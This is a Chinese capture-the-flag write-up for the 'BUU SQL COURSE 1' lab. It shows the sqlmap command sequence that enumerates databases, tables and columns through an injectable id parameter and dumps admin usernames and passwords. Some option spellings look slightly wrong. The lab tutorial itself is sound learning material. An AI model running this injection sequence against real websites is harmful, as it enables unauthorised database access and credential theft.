4、BUU SQL COURSE 1
这个题目看名称猜到应该是从SQL注入入手,登录靶机后的页面如下,考虑用sqlmap爆库和表:
登录上去点击第一个新闻页面,查看开发者模式(浏览器右上角的三个竖点->更多工具->开发者工具),看到如下语句,将下图中的url地址(红色框中包含id=1的内容)作为sqlmap的参数执行下面的命令。
sqlmap -u "
http://79cb4b2b-6457-4dcf-b2d0-ba8fc2e4310f.node4.buuoj.cn:81/backend/content_detail.php?id=1"
可以看到显示如下提示内容,显示sqlmap连不上,需要加上 -random-agent的参数,这是因为sqlmap频繁扫描目标主机,目标主机对于sqlmap的ip地址进行了封锁。
【https://www.cnblogs.com/z9m8r8/articles/15164212.html 文中有如下说明:
默认情况下,sqlmap发送的HTTP报文的 user-agent 都是Sqlmap而不是常见的Mozilla等,这通常会被防火墙过滤掉, 选项–random-agent 会随机选取./txt/user-agents.txt中的报头】
sqlmap -u "
http://79cb4b2b-6457-4dcf-b2d0-ba8fc2e4310f.node4.buuoj.cn:81/backend/content_detail.php?id=1" -random-agent
通过上面的命令,可以查看到该url存在如下l可利用信息
爆库
sqlmap -u "http://f928a413-46d0-490d-b042-9f82259a2f81.node4.buuoj.cn:81/backend/content_detail.php?id=1" -random-agent -dbs
可以看到数据库名称如上,news和test感觉可能有我们需要的内容,先查看news中的表
查数据库news中的数据表
sqlmap -u "http://f928a413-46d0-490d-b042-9f82259a2f81.node4.buuoj.cn:81/backend/content_detail.php?id=1" -random-agent -D news --tables
爆表,查看admin表中的信息,感觉希望就在眼前
查数据表admin中的列
sqlmap -u "http://f928a413-46d0-490d-b042-9f82259a2f81.node4.buuoj.cn:81/backend/content_detail.php?id=1" -random-agent -T admin --columns
dump admin表中的值
sqlmap -u "http://f928a413-46d0-490d-b042-9f82259a2f81.node4.buuoj.cn:81/backend/content_detail.php?id=1" -random-agent -T admin -c id,password,username --dump
用上图中的admin和password直接登录靶机,成功获得flag,并不需要对上图中获取到的password进行破解等,但是后续可能会需要需要对password进行破解的i情况。